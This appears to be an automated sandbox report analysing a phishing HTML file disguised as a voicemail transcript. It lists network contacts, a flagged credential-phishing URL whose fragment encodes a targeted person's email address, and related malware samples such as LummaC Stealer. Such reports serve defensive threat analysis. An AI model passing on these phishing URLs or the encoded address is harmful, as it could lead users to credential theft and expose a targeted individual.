              truefalse
                high
                s-part-0015.t-0009.t-msedge.net
                13.107.246.43
                truefalse
                  high
                  www.google.com
                  142.250.181.100
                  truefalse
                    high
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru
                      104.21.3.44
                      truefalse
                        unknown
                        s-0005.dual-s-msedge.net
                        52.123.129.14
                        truefalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              teams.nel.measure.office.net
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5ifalse
                                    high
                                    https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.jsfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgfalse
                                          high
                                          https://aadcdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsfalse
                                            high
                                            https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.cssfalse
                                              high
                                              https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgfalse
                                                high
                                                https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1hbkBhby51c2NvdXJ0cy5nb3Y=true
                                                  unknown
                                                  https://j9lg.xbyhiqbjl.com/admi/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ec5727f9d0241a1&lang=autofalse
                                                    high
                                                    https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.jsfalse
                                                      high
                                                      https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giffalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://local.teams.office.com/sourcemaps/hashed-assets/214218-d26bcec144ea0bad.js.mapchromecache_788.2.dr, chromecache_551.2.drfalse
                                                          high
                                                          https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.mapchromecache_882.2.dr, chromecache_634.2.drfalse
                                                            high
                                                            https://aka.ms/teamsliveauditoriumchromecache_724.2.dr, chromecache_764.2.drfalse
                                                              high
                                                              https://local.teams.office.com/sourcemaps/hashed-assets/459872-6142424fcf6e95ed.js.mapchromecache_524.2.dr, chromecache_533.2.drfalse
                                                                high
                                                                https://local.teams.office.com/sourcemaps/hashed-assets/990536-bbff6dab6502e105.js.mapchromecache_828.2.dr, chromecache_723.2.drfalse
                                                                  high
                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/789291-5261394304c4b6e2.js.mapchromecache_752.2.dr, chromecache_805.2.drfalse
                                                                    high
                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/412417-b3da2627a5108e3b.js.mapchromecache_881.2.dr, chromecache_659.2.drfalse
                                                                      high
                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/534940-f1c535e0c8723100.js.mapchromecache_676.2.dr, chromecache_590.2.drfalse
                                                                        high
                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/526413-8a95c600f1d95ec1.js.mapchromecache_512.2.dr, chromecache_792.2.drfalse
                                                                          high
                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/780368-3e86a874e98fee98.js.mapchromecache_685.2.dr, chromecache_553.2.drfalse
                                                                            high
                                                                            http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).chromecache_514.2.dr, chromecache_672.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.mapchromecache_665.2.dr, chromecache_629.2.drfalse
                                                                              high
                                                                              https://aka.ms/teamshost/?liveevent=true&tenantId=chromecache_724.2.dr, chromecache_764.2.drfalse
                                                                                high
                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/367927-44fa44710376bb7a.js.mapchromecache_907.2.dr, chromecache_876.2.drfalse
                                                                                  high
                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/78219-72fea9acaacd14dd.js.mapchromecache_578.2.dr, chromecache_492.2.drfalse
                                                                                    high
                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/337355-53949d9632bb831d.js.mapchromecache_484.2.dr, chromecache_743.2.drfalse
                                                                                      high
                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/79645-cfc686ee6202a315.js.mapchromecache_497.2.dr, chromecache_599.2.drfalse
                                                                                        high
                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/387552-8425a3283a90f51e.js.mapchromecache_710.2.dr, chromecache_894.2.drfalse
                                                                                          high
                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/985157-23a375d8f9446453.js.mapchromecache_605.2.dr, chromecache_845.2.drfalse
                                                                                            high
                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/169767-cde234dc0bbb0b5b.js.mapchromecache_722.2.dr, chromecache_639.2.drfalse
                                                                                              high
                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/492696-55b16e88aaa4fe43.js.mapchromecache_717.2.dr, chromecache_588.2.drfalse
                                                                                                high
                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.mapchromecache_658.2.drfalse
                                                                                                  high
                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/812302-f220939f159b2a8a.js.mapchromecache_686.2.dr, chromecache_520.2.drfalse
                                                                                                    high
                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/900161-4a3c2a69b8fc85e1.js.mapchromecache_866.2.dr, chromecache_482.2.drfalse
                                                                                                      high
                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/674958-37b4889b0bcb5464.js.mapchromecache_896.2.dr, chromecache_523.2.drfalse
                                                                                                        high
                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/71987-4479046fa7761d52.js.mapchromecache_873.2.dr, chromecache_536.2.drfalse
                                                                                                          high
                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/984459-230ebea54bbba9d2.js.mapchromecache_898.2.dr, chromecache_837.2.drfalse
                                                                                                            high
                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/129917-4d360edd57ebd485.js.mapchromecache_789.2.dr, chromecache_609.2.drfalse
                                                                                                              high
                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/711005-dcc14d48e317723d.js.mapchromecache_786.2.dr, chromecache_916.2.drfalse
                                                                                                                high
                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/283032-49ed3292ba6ccaf2.js.mapchromecache_782.2.dr, chromecache_496.2.drfalse
                                                                                                                  high
                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/725591-f9265ef9f2d4e54e.js.mapchromecache_597.2.dr, chromecache_569.2.drfalse
                                                                                                                    high
                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/416397-1c547cab2265aa75.js.mapchromecache_783.2.dr, chromecache_707.2.drfalse
                                                                                                                      high
                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/990521-e9325ffc81da8165.js.mapchromecache_868.2.dr, chromecache_840.2.drfalse
                                                                                                                        high
                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/626119-03d9192fddf72b86.js.mapchromecache_586.2.dr, chromecache_657.2.drfalse
                                                                                                                          high
                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/669152-07edb61a22aacff3.js.mapchromecache_781.2.dr, chromecache_623.2.drfalse
                                                                                                                            high
                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/296222-7353105a2ca8e337.js.mapchromecache_906.2.dr, chromecache_911.2.drfalse
                                                                                                                              high
                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/972276-16a6accc1de1eb6a.js.mapchromecache_490.2.dr, chromecache_542.2.drfalse
                                                                                                                                high
                                                                                                                                https://github.com/douglascrockford/JSON-jschromecache_920.2.dr, chromecache_734.2.dr, chromecache_813.2.dr, chromecache_915.2.dr, chromecache_521.2.dr, chromecache_890.2.dr, chromecache_647.2.dr, chromecache_778.2.dr, chromecache_537.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/455485-9eeec0dc31ad317f.js.mapchromecache_641.2.dr, chromecache_820.2.drfalse
                                                                                                                                    high
                                                                                                                                    http://www.opensource.org/licenses/mit-license.php)chromecache_915.2.dr, chromecache_521.2.dr, chromecache_890.2.dr, chromecache_537.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/816373-105b523bdd46a179.js.mapchromecache_498.2.dr, chromecache_601.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/global-auth-d4ae5457f50af70f.js.mapchromecache_923.2.dr, chromecache_511.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/710639-d32f6e097a5709e2.js.mapchromecache_530.2.dr, chromecache_775.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/829271-5bfd7ab6aba19f68.js.mapchromecache_574.2.dr, chromecache_700.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/411326-fee4befbdfec8c54.js.mapchromecache_905.2.dr, chromecache_573.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/909600-d04627bb00218ec6.js.mapchromecache_572.2.dr, chromecache_904.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/441408-59c7bce56597ae49.js.mapchromecache_739.2.dr, chromecache_618.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/802756-1461cbc85977eebf.js.mapchromecache_603.2.dr, chromecache_643.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/supermassive-incremental-link-4eeacb7f645bb9chromecache_794.2.dr, chromecache_903.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/662908-71da5000e4ef5f3f.js.mapchromecache_897.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/40790-c113489658672afc.js.mapchromecache_777.2.dr, chromecache_636.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/meeting-collaboration-locale-en-us-c632953fcchromecache_738.2.dr, chromecache_809.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/async-entry-30ceeed1b130572d.js.mapchromecache_684.2.dr, chromecache_716.2.dr, chromecache_815.2.dr, chromecache_559.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/417548-aa8c7d7584ee7aca.js.mapchromecache_703.2.dr, chromecache_785.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/872355-49ee321fd83c8ee9.js.mapchromecache_799.2.dr, chromecache_842.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/468376-9ab9597f558e2998.js.mapchromecache_651.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/914945-cba296ef334bdcfb.js.mapchromecache_663.2.dr, chromecache_715.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/9124-7837fcade4988613.js.mapchromecache_566.2.dr, chromecache_598.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/336776-b73125696b681791.js.mapchromecache_677.2.dr, chromecache_594.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://login.windows-ppe.netchromecache_560.2.dr, chromecache_491.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/688261-29e1c480c81d0be2.js.mapchromecache_895.2.dr, chromecache_613.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/659426-83b594f2e0333f35.js.mapchromecache_479.2.dr, chromecache_478.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/204348-6c2a726c296c1d1e.js.mapchromecache_671.2.dr, chromecache_563.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/797193-8730731cf6bc6c07.js.mapchromecache_494.2.dr, chromecache_633.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/932549-c7ef1a597d32507c.js.mapchromecache_635.2.dr, chromecache_674.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://login.microsoftonline.comchromecache_560.2.dr, chromecache_491.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/166017-2ac8e8df661d5d48.js.mapchromecache_749.2.dr, chromecache_692.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/shell-app-99823cb7a224910c.js.mapchromecache_499.2.dr, chromecache_645.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/233940-74cf9f018d3d63e1.js.mapchromecache_771.2.dr, chromecache_670.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/273198-072882987da06b97.js.mapchromecache_550.2.dr, chromecache_515.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/170464-a41687f997fee720.js.mapchromecache_733.2.dr, chromecache_501.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/816410-26421d0c40cd02ca.js.mapchromecache_747.2.dr, chromecache_500.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/7747-899d03cb39279d83.js.mapchromecache_689.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/865969-5f963a9d50c28fb0.js.mapchromecache_745.2.dr, chromecache_859.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/326041-fdfc59addb335cea.js.mapchromecache_880.2.dr, chromecache_874.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/883493-4a109dbe7427e209.js.mapchromecache_660.2.dr, chromecache_825.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/main-locale-en-us-ca67599dc193ecbe.js.mapchromecache_719.2.dr, chromecache_806.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/499319-ba112383185f5946.js.mapchromecache_593.2.dr, chromecache_851.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/13290-ac75815148d48467.js.mapchromecache_693.2.dr, chromecache_879.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://local.teams.office.com/sourcemaps/hashed-assets/120951-1965c2e12a30acee.js.mapchromecache_848.2.dr, chromecache_760.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/334217-424fbc14c44cda15.js.mapchromecache_538.2.dr, chromecache_731.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/618332-82f3e580c26e4cde.js.mapchromecache_546.2.dr, chromecache_816.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://local.teams.office.com/sourcemaps/hashed-assets/r_data-resolvers-browser-1gql-view-data-5528chromecache_602.2.dr, chromecache_784.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://local.teams.office.com/sourcemaps/hashed-assets/763473-75dc880f1f9fdebc.js.mapchromecache_913.2.dr, chromecache_774.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://local.teams.office.com/sourcemaps/hashed-assets/237080-52321579da5a9d19.js.mapchromecache_642.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://local.teams.office.com/sourcemaps/hashed-assets/606492-67dda887dcf8b751.js.mapchromecache_595.2.dr, chromecache_893.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://local.teams.office.com/sourcemaps/hashed-assets/986559-4ca7a71999c4c275.js.mapchromecache_673.2.dr, chromecache_650.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    13.107.246.43
                                                                                                                                                                                                                                    s-part-0015.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    13.107.246.63
                                                                                                                                                                                                                                    s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    15.197.142.173
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    7430TANDEMUSfalse
                                                                                                                                                                                                                                    104.18.94.41
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    52.123.129.14
                                                                                                                                                                                                                                    s-0005.dual-s-msedge.netUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    151.101.66.137
                                                                                                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                    151.101.194.137
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    104.17.24.14
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    172.67.211.241
                                                                                                                                                                                                                                    j9lg.xbyhiqbjl.comUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    69.49.245.172
                                                                                                                                                                                                                                    karaokebooks.netUnited States
                                                                                                                                                                                                                                    46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                    104.18.95.41
                                                                                                                                                                                                                                    challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    104.21.3.44
                                                                                                                                                                                                                                    0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ruUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    52.123.128.14
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    142.250.181.100
                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                    152.199.21.175
                                                                                                                                                                                                                                    sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                                                                                                                    15133EDGECASTUSfalse
                                                                                                                                                                                                                                    104.17.25.14
                                                                                                                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1567690
                                                                                                                                                                                                                                    Start date and time:2024-12-03 18:57:42 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 6m 25s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:AudioplaybackVM--00-32AoTranscript.html
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal64.phis.evad.winHTML@31/677@48/19
                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .html
                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 64.233.165.84, 34.104.35.123, 142.250.181.74, 142.250.181.10, 172.217.17.74, 142.250.181.106, 142.250.181.42, 142.250.181.138, 172.217.19.10, 172.217.17.42, 172.217.19.234, 172.217.21.42, 172.217.19.202, 84.201.208.68, 192.229.221.95, 23.32.238.26, 23.32.238.51, 172.217.17.35, 172.217.19.206, 52.113.194.132, 20.42.65.89, 2.20.68.227, 2.20.68.217, 95.101.110.173, 95.101.110.159, 20.190.181.6, 20.190.181.0, 20.190.181.3, 40.126.53.10, 40.126.53.18, 40.126.53.13, 40.126.53.6, 40.126.53.11, 20.190.147.10, 20.190.147.1, 20.190.177.20, 20.190.177.22, 20.190.147.3, 20.190.147.11, 20.190.177.21, 20.190.147.6, 51.105.71.136, 20.190.147.7, 20.190.177.23, 20.190.177.147, 20.190.177.83, 20.190.147.0, 20.190.177.85, 20.190.147.12, 20.190.177.19, 20.190.177.149, 20.190.147.9, 20.190.147.8, 20.190.177.146, 20.190.147.5, 172.217.19.170, 52.178.17.3, 20.190.177.84
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, ak.privatelink.msidentity.com, clients2.google.com, ocsp.digicert.com, login.live.com, update.googleapis.com, config.teams.microsoft.com, statics.teams.cdn.office.net, fs.microsoft.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, onedscolprduks00.uksouth.cloudapp.azure.com, www.tm.v4.a.prd.aadg.akadns.net, aadcdn.msauth.net, eu.events.data.trafficmanager.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, s-0005.s-msedge.net, aadcdnoriginwus2.afd.azureedge.net, onedscolprdeus11.eastus.cloudapp.azure.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com, a1894.dscb.akamai.net, teams.events.data.microsoft.com, teams-staticscdn.trafficmanager.net, login.mso.msidentity.com, optimizationguide-pa.googleapis.com, clients1.google.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidenti
                                                                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • VT rate limit hit for: AudioplaybackVM--00-32AoTranscript.html
                                                                                                                                                                                                                                    No simulations
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    13.107.246.43file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      FW_ Fwd_ Voice Mail Message - 5TH Judicial Circuit.emlGet hashmaliciousLure-BasedAttack, HTMLPhisherBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  VNC Sales.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VVmliM0U9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        13.107.246.63file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              6PAuIAUnwm.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  Ksl3V3pqZq.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    n19xU1hV2t.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            15.197.142.173firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 15.197.142.173/
                                                                                                                                                                                                                                                                            7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • womanbelieve.net/index.php
                                                                                                                                                                                                                                                                            mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • womanbelieve.net/index.php
                                                                                                                                                                                                                                                                            7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • womanbelieve.net/index.php
                                                                                                                                                                                                                                                                            mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • womanbelieve.net/index.php
                                                                                                                                                                                                                                                                            vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • womanbelieve.net/index.php
